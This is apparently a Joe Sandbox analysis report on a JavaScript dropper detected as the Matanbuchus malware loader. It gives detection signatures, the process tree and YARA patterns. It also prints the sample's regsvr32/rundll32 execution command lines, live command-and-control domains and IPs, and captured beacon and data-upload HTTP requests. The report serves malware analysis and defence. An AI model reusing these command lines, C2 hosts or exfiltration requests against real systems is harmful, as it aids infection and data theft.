Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Doc_21-04-53.js

Overview

General Information

Sample name:Doc_21-04-53.js
Analysis ID:1570376
MD5:c10e7bce33b8d71ecd178565a63bb4ed
SHA1:b2c32607a225fe745dd4d1f40e78578621728be1
SHA256:09b473434edae856dc199c34092a9b4a9f735a0b0aeb1a03828fa215d1ce0237
Tags:BruteRatelC4jsLatrodectususer-k3dg3___
Infos:

Detection

Matanbuchus
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Matanbuchus
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7008 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • msiexec.exe (PID: 7164 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 1312 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B05575DDF7F0D21FAECF0BEEF6387BEE MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 4324 cmdline: C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init MD5: EF3179D498793BF4234F708D3BE28633)
      • rundll32.exe (PID: 1908 cmdline: C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init MD5: 889B99C52A60DD49227C5E485A016679)
  • regsvr32.exe (PID: 4080 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 4940 cmdline: -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • regsvr32.exe (PID: 5572 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 2500 cmdline: -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • regsvr32.exe (PID: 1144 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 1712 cmdline: -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MatanbuchusAccording to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections.Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\silver\libcurl.dllJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
    C:\Users\user\8f08\813848\813848.winmdJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_4ce9affbunknownunknown
      • 0x1d895:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
      • 0x1f125:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
      0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
      • 0x33350:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
      00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
        00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_4ce9affbunknownunknown
        • 0x1f275:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
        • 0x20b05:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
        00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
        • 0x34d30:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        14.2.regsvr32.exe.6b610000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
          6.2.regsvr32.exe.6b610000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
            11.2.regsvr32.exe.6b610000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
              4.2.rundll32.exe.4f80000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
                4.2.rundll32.exe.6c330000.1.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
                  Click to see the 19 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Potentially Suspicious Malware Callback Communication
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.234.216.175, DestinationIsIpv6: false, DestinationPort: 4443, EventID: 3, Image: C:\Windows\SysWOW64\rundll32.exe, Initiated: true, ProcessId: 1908, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49740
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", ProcessId: 7008, ProcessName: wscript.exe
                  Sigma detected: Msiexec Initiated Connection
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.40.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 7164, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                  Sigma detected: Network Connection Initiated By Regsvr32.EXE
                  Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 185.234.216.175, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 4940, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js", ProcessId: 7008, ProcessName: wscript.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-06T22:20:25.117789+010020344681Malware Command and Control Activity Detected192.168.2.449751185.234.216.1754443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results
                  Source: unknownHTTPS traffic detected: 104.21.40.3:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49733 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49780 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49938 version: TLS 1.2
                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.4:49751 -> 185.234.216.175:4443
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 185.234.216.175 443Jump to behavior
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49885
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49901
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49906
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49910
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49932
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49939
                  Source: global trafficTCP traffic: 192.168.2.4:49740 -> 185.234.216.175:4443
                  Source: Joe Sandbox ViewASN Name: SPRINT-SDCPL SPRINT-SDCPL
                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E4390 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor,4_2_7F2E4390
                  Source: global trafficHTTP traffic detected: GET /klog.php HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: axizlhop.life
                  Source: global trafficHTTP traffic detected: GET /AdminAccounts.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /verif.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: security-patches.systemsCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: axizlhop.life
                  Source: global trafficDNS traffic detected: DNS query: security-patches.systems
                  Source: unknownHTTP traffic detected: POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1User-Agent: Microsoft-WNS/10.0Host: security-patches.systemsContent-Length: 525Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CAData Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6e 4e 30 56 33 45 31 4b 32 78 43 52 6e 67 7a 5a 6d 70 42 50 54 30 69 4c 43 4a 47 63 33 52 4d 49 6a 6f 69 63 54 68 79 54 6a 64 77 54 58 42 43 62 6b 74 70 61 57 67 30 52 58 5a 57 61 6c 4d 78 55 6b 55 39 49 69 77 69 53 47 52 57 55 58 42 42 49 6a 6f 69 63 69 38 72 52 6a 5a 6a 51 6a 4a 4d 56 6c 68 71 49 69 77 69 55 55 5a 61 65 57 6c 70 56 56 68 5a 49 6a 6f 69 4d 58 4a 71 56 47 74 4b 54 54 67 69 4c 43 4a 53 59 6d 39 30 49 6a 6f 69 64 57 4e 68 65 54 51 72 51 6c 64 44 4d 6c 68 6d 49 69 77 69 55 32 4a 61 56 32 35 59 49 6a 6f 69 4d 7a 64 71 55 6d 31 61 56 58 63 69 4c 43 4a 5a 61 30 70 58 49 6a 70 62 49 6e 52 50 61 55 77 69 58 53 77 69 59 32 5a 4c 57 43 49 36 49 6a 4a 6e 50 54 30 69 4c 43 4a 6f 54 6d 39 32 53 6d 30 69 4f 69 4a 77 4b 32 56 56 65 6d 4e 7a 63 30 5a 6f 62 58 5a 71 52 45 4a 69 4e 6c 56 58 63 6d 39 42 50 54 30 69 4c 43 4a 76 51 6e 56 4e 56 58 55 69 4f 69 4a 6f 54 32 46 50 65 6d 52 52 50 53 49 73 49 6e 4e 30 64 56 6b 69 4f 69 49 78 63 6d 70 61 62 56 45 39 50 53 49 73 49 6e 5a 76 53 6d 4d 69 4f 69 4a 74 54 32 46 78 65 58 63 39 50 53 49 73 49 6e 64 42 59 30 67 69 4f 69 4a 78 54 30 4e 50 65 57 4e 7a 4d 32 46 6e 50 54 30 69 4c 43 4a 33 55 57 56 53 53 43 49 36 49 6a 4a 4d 4d 30 45 32 63 7a 56 33 49 69 77 69 65 47 56 44 59 32 70 54 49 6a 6f 69 64 53 39 78 52 6a 4a 6e 50 54 30 69 4c 43 4a 35 61 57 6c 56 57 46 6b 69 4f 69 4a 79 59 6b 38 34 4c 7a 67 31 63 55 6c 47 4c 7a 52 32 51 55 34 32 4f 56 49 32 62 32 39 75 4e 56 52 72 64 32 77 33 5a 47 4a 76 61 6e 68 6f 55 58 64 54 56 6d 64 59 52 57 64 4a 50 53 4a 39 Data Ascii: data=eyJBbldGaCI6InN0V3E1K2xCRngzZmpBPT0iLCJGc3RMIjoicThyTjdwTXBCbktpaWg0RXZWalMxUkU9IiwiSGRWUXBBIjoici8rRjZjQjJMVlhqIiwiUUZaeWlpVVhZIjoiMXJqVGtKTTgiLCJSYm90IjoidWNheTQrQldDMlhmIiwiU2JaV25YIjoiMzdqUm1aVXciLCJZa0pXIjpbInRPaUwiXSwiY2ZLWCI6IjJnPT0iLCJoTm92Sm0iOiJwK2VVemNzc0ZobXZqREJiNlVXcm9BPT0iLCJvQnVNVXUiOiJoT2FPemRRPSIsInN0dVkiOiIxcmpabVE9PSIsInZvSmMiOiJtT2FxeXc9PSIsIndBY0giOiJxT0NPeWNzM2FnPT0iLCJ3UWVSSCI6IjJMM0E2czV3IiwieGVDY2pTIjoidS9xRjJnPT0iLCJ5aWlVWFkiOiJyYk84Lzg1cUlGLzR2QU42OVI2b29uNVRrd2w3ZGJvanhoUXdTVmdYRWdJPSJ9
                  Source: regsvr32.exeString found in binary or memory: http://schemas.xml
                  Source: wscript.exe, 00000000.00000002.1700649296.0000021D64745000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700078062.0000021D645DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700047143.0000021D645A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1699750711.0000021D645B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1699750711.0000021D6459D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1700557606.0000021D645DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1699942611.0000021D645DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1699835068.0000021D645D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1700451982.0000021D645A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://axizlhop.life/klog.php
                  Source: rundll32.exe, 00000004.00000002.2943141043.0000000002D9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2943141043.0000000002DFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://security-patches.systems/
                  Source: rundll32.exe, 00000004.00000002.2943141043.0000000002DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://security-patches.systems/AdminAccounts.aspx
                  Source: rundll32.exe, 00000004.00000002.2943141043.0000000002DFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://security-patches.systems/verif.aspx
                  Source: rundll32.exe, 00000004.00000002.2943141043.0000000002DFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://security-patches.systems/verif.aspxP
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
